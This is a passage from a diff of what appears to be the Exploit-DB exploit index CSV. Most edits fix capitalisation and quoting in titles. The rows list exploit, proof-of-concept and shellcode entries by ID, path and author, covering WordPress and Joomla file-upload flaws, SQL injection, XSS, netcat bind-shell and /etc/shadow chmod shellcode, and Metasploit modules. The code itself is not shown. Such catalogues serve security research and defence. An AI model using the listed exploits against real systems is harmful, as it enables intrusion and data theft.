1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 @@ -33650,7 +33653,7 @@ id,file,description,date,author,platform,type,port 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution",2015-06-10,Metasploit,linux,remote,0 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 -37264,platforms/php/webapps/37264.txt,"Wordpress Encrypted Contact Form Plugin 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 +37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - Cross-Site Request Forgery",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Privilege Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 - '.m3u' Local Crash (PoC)",2015-06-12,0neb1n,windows,dos,0 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 - Local Crash (PoC)",2015-06-12,0neb1n,windows,dos,0 @@ -33658,18 +33661,18 @@ id,file,description,date,author,platform,type,port 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 37271,platforms/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080 -37274,platforms/php/webapps/37274.txt,"Wordpress SE HTML5 Album Audio Player 1.1.0 Plugin - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 -37275,platforms/php/webapps/37275.txt,"Wordpress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Plugin - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 -37277,platforms/php/webapps/37277.txt,"concrete5 - index.php/tools/required/files/search_dialog ocID Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37278,platforms/php/webapps/37278.txt,"concrete5 - index.php/tools/required/files/customize_search_columns searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37279,platforms/php/webapps/37279.txt,"concrete5 - index.php/tools/required/files/search_results searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37280,platforms/php/webapps/37280.txt,"concrete5 - index.php/tools/required/sitemap_search_selector Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37281,platforms/php/webapps/37281.txt,"concrete5 - index.php/tools/required/files/import Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 -37282,platforms/php/webapps/37282.txt,"concrete5 - index.php/tools/required/files/bulk_properties searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 Plugin - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 +37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Plugin - Arbitrary File Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 +37277,platforms/php/webapps/37277.txt,"Concrete5 - index.php/tools/required/files/search_dialog ocID Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37278,platforms/php/webapps/37278.txt,"Concrete5 - index.php/tools/required/files/customize_search_columns searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37279,platforms/php/webapps/37279.txt,"Concrete5 - index.php/tools/required/files/search_results searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37280,platforms/php/webapps/37280.txt,"Concrete5 - index.php/tools/required/sitemap_search_selector Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37281,platforms/php/webapps/37281.txt,"Concrete5 - index.php/tools/required/files/import Multiple Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 +37282,platforms/php/webapps/37282.txt,"Concrete5 - index.php/tools/required/files/bulk_properties searchInstance Parameter Cross-Site Scripting",2012-05-20,AkaStep,php,webapps,0 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 -37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0 +37286,platforms/windows/dos/37286.py,"FileZilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client Denial of Service (PoC)",2015-06-15,LiquidWorm,windows,dos,0 37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection",2012-06-05,rwenzel,php,webapps,0 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 @@ -33697,10 +33700,10 @@ id,file,description,date,author,platform,type,port 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 -37356,platforms/php/webapps/37356.txt,"Wordpress Email Newsletter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 -37357,platforms/php/webapps/37357.php,"Wordpress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37356,platforms/php/webapps/37356.txt,"WordPress Email NewsLetter Plugin 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 +37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function Cross-Site Request Forgery",2012-05-31,"Shadman Tanjim",php,webapps,0 -37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution - (WHMCS) 5.0 knowledgebase.php search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 +37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution - (WHMCS) 5.0 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - File Upload Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 @@ -33712,10 +33715,10 @@ id,file,description,date,author,platform,type,port 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80 -37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - .gif Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 -37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 - .gif Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 -37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - .png Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 -37361,platforms/php/webapps/37361.txt,"Wordpress Huge-IT Slider 2.7.5 Plugin - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 +37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 +37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 +37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 +37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 Plugin - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80 37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 @@ -33724,24 +33727,24 @@ id,file,description,date,author,platform,type,port 37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,Metasploit,windows,local,0 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow",2015-06-24,Metasploit,multiple,remote,0 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 -37370,platforms/php/webapps/37370.php,"Wordpress FCChat Widget Plugin 2.2.x - 'upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 -37371,platforms/php/webapps/37371.php,"Wordpress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 +37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x - 'upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 +37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 -37373,platforms/php/webapps/37373.php,"Wordpress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0 -37377,platforms/php/webapps/37377.php,"Wordpress HD FLV Player Plugin - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 -37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFUpload Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 +37377,platforms/php/webapps/37377.php,"WordPress HD FLV Player Plugin - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 +37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFupload Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37379,platforms/php/webapps/37379.php,"Joomla! Art Uploader Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37380,platforms/php/webapps/37380.php,"Joomla! DentroVideo Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37381,platforms/php/webapps/37381.html,"Joomla! IDoEditor Component - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 -37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OSX Yosemite 10.10.3 - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 +37386,platforms/osx/dos/37386.php,"Apple Mac OS X 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 -37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 +37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 @@ -33752,27 +33755,27 @@ id,file,description,date,author,platform,type,port 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 37397,platforms/php/webapps/37397.html,"SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,php,webapps,0 -37399,platforms/php/webapps/37399.php,"Wordpress Evarisk Plugin - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 +37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 -37403,platforms/php/webapps/37403.php,"Wordpress Invit0r Plugin - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 +37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 -37406,platforms/php/webapps/37406.php,"Wordpress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 +37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0 -37411,platforms/php/webapps/37411.txt,"Wordpress Organizer Plugin - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 +37411,platforms/php/webapps/37411.txt,"WordPress ORGanizer Plugin - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0 37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 -37417,platforms/php/webapps/37417.php,"Wordpress Multiple Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 -37418,platforms/php/webapps/37418.php,"Wordpress LB Mixed Slideshow Plugin - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 -37419,platforms/php/webapps/37419.txt,"Wordpress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 +37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 +37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 +37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 37566,platforms/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 @@ -33784,10 +33787,10 @@ id,file,description,date,author,platform,type,port 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - encoded execve Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0 37430,platforms/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 -37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 +37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'Uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,php,webapps,0 -37434,platforms/php/webapps/37434.txt,"e107 FileDownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 +37434,platforms/php/webapps/37434.txt,"e107 Filedownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37435,platforms/php/webapps/37435.txt,"web@all - Cross-Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 37436,platforms/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",php,webapps,0 37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0 @@ -33803,9 +33806,9 @@ id,file,description,date,author,platform,type,port 37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - Cross-Site Request Forgery",2015-06-30,"Wissam Bashour",asp,webapps,0 37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption",2015-06-30,Metasploit,multiple,remote,0 37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0 -37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 -37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 -37452,platforms/php/webapps/37452.txt,"Wordpress Flip Book Plugin - 'PHP.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 +37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'Uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 +37451,platforms/php/webapps/37451.txt,"Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 +37452,platforms/php/webapps/37452.txt,"WordPress Flip Book Plugin - 'PHP.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 @@ -33816,15 +33819,15 @@ id,file,description,date,author,platform,type,port 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,php,webapps,0 37461,platforms/php/webapps/37461.txt,"DigPHP - 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps,0 37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 -37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-By-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 -37464,platforms/php/webapps/37464.txt,"Wordpress Albo Pretorio Online 3.2 Plugin - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 +37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 +37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 Plugin - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 37466,platforms/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion - 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",php,webapps,0 37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps,0 37469,platforms/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,php,webapps,0 -37470,platforms/multiple/webapps/37470.txt,"SWFUpload - 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 -37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' File Divide-By-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 -37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 +37470,platforms/multiple/webapps/37470.txt,"SWFupload - 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 +37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' File Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 +37472,platforms/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x - Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Function Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 @@ -33833,29 +33836,29 @@ id,file,description,date,author,platform,type,port 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0 -37481,platforms/php/webapps/37481.txt,"Wordpress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37482,platforms/php/webapps/37482.txt,"Wordpress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 -37483,platforms/php/webapps/37483.txt,"Wordpress church_admin Plugin - 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37484,platforms/php/webapps/37484.txt,"Wordpress Knews Multilingual Newsletters Plugin - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37485,platforms/php/webapps/37485.txt,"Wordpress PHPFreeChat Plugin - 'url' Parameter 